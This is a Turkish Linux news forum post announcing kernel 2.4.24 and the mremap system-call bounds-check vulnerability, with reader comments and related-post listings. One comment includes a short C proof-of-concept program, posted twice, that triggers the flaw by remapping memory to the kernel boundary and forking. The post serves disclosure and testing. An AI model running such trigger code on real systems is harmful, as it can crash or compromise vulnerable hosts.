Kernel 2.4.24 Çıktı

0
bahadirkandemir
bahadirkandemir
6 Ocak 2004 , 1 dakika okuma süresi
Kernel'in bellek yönetim kodunda, mremap(2) sistem çağrısındaki hatalı sınır kontrolünden kaynaklanan bir güvenlik zayıflığı bulundu.

mremap sistem çağrısı, sanal bellek alanlarının adreslenebilir boşluklarını taşımak ve boyutlarını değiştirme imkanı sağlıyor.

Duyurunun tamamı: http://isec.pl/vulnerabilities/isec-0013-mremap.txt
linux
3
Linkedin Facebook Twitter Google plus

Görüşler

bahadirkandemir
0
bahadirkandemir
NOT: Bu zayıflığın 2.2, 2.4 ver 2.6 serilerinde olduğu belirtilmişti ancak, zayıflığı keşfeden güvenlik grubu bu açığın MREMAP_FIXED bayrağını desteklemeyen 2.2 serilerinde olmadığını önemli güvenlik listelerinde duyurdu.

Kernel 2.6.0'da aynı zayıflığın olduğu duyurulmuştu, 2.6.1-rc1'de zayıflığın giderilmediği, 2.6.1-rc2'de giderildiği ek bir açıklama ile duyuruldu.

Zayıflığı test etmek isteyenler aşağıdaki kodu deneyebilir:

#include
#include
#include
#include

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}
realist
0
realist
ne #include ediyoruz?
hangi #include ?
bahadirkandemir
0
bahadirkandemir
Sanırım < ve > karakterleri sorun yarattı. 2 kere önizleme yapmamdan kaynaklandı.

----------------------------------------------

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}
Görüş belirtmek için giriş yapın...

İlgili Yazılar

Klaus Knopper ile röportaj
raistlinthewiz
7 Aralık 2002, 1 dakika okuma süresi

Knoppix'in yaratıcısı ile yapılmış olan bir röportaj.
Knoppix hakkında oldukça yararlı bilgiler içermekte.
www.osnews.com/story.php?news_id=2305

Yılın Penguenleri Ödülleri Sahiplerini Bekliyor!
anonim
18 Nisan 2003, 1 dakika okuma süresi

Bu yıl ikincisi gerçekleşecek olan Linux ve Özgür Yazılım Şenliği sırasında geçen yılki gibi bu sene de yılın penguenleri çeşitli dallarda ödül alacaklar. "Ödül almazsa olmaz" diye düşündüğünüz penguenleri aday göstermek icin http://senlik.linux.org.tr/odul_oneri.php adresinden öneride bulunabilirsiniz

Editörün notu: FM'i henüz kimse önermemiş

Linux World´den Linus Torvalds röpörtajı
tongucyumruk
16 Kasım 2002, 1 dakika okuma süresi

Linux World, ruhani liderimiz Linus Torvalds ile yaptığı röpörtaj'da şimdiye kadar birçok kimsenin sormaya çekindiği soruları cesurca soruyor; Linux ve Linus ile ilgili karanlıkta kalmış birçok noktayı aydınlatıyor. İşte Linus Torvalds'ın gerçek yüzü.

Desktop GNU/Linux Mümkün!
mrtksn
7 Şubat 2006, 1 dakika okuma süresi

Sıradan bir Desktop PC kullanıcısının hiç bir GNU/Linux dağıtımını kullanamayacağını düşünüyordum, ama bu önyargım kırıldı.

Oda arkadaşımın PC'sinin sabit diski 2 ay kadar önce soru çıkarmaya başladı,bazen tepki vermez oldu ve windowsu boot edemez hale geldi; Bunun üzerine günü kurtarmak için arkadaşıma Knoppix 4.0 Live CD yi önerdim, ilk başta dalga geçti...

Gentoo 2005.1 Hizmetinizde!
zekeriya_akyildiz
13 Ağustos 2005, 1 dakika okuma süresi

Gentoo 2005.1 duyuruldu. Hemen edinmek istiyorsanız buyrun;
http://www.gentoo.org

Not: Eğer isterseniz GLIS 0.1 ile görsel bir kurulum yapma olanağına da sahipsiniz. Ancak henüz beta aşamasında olduğu için ufak bir numara gerektiriyor.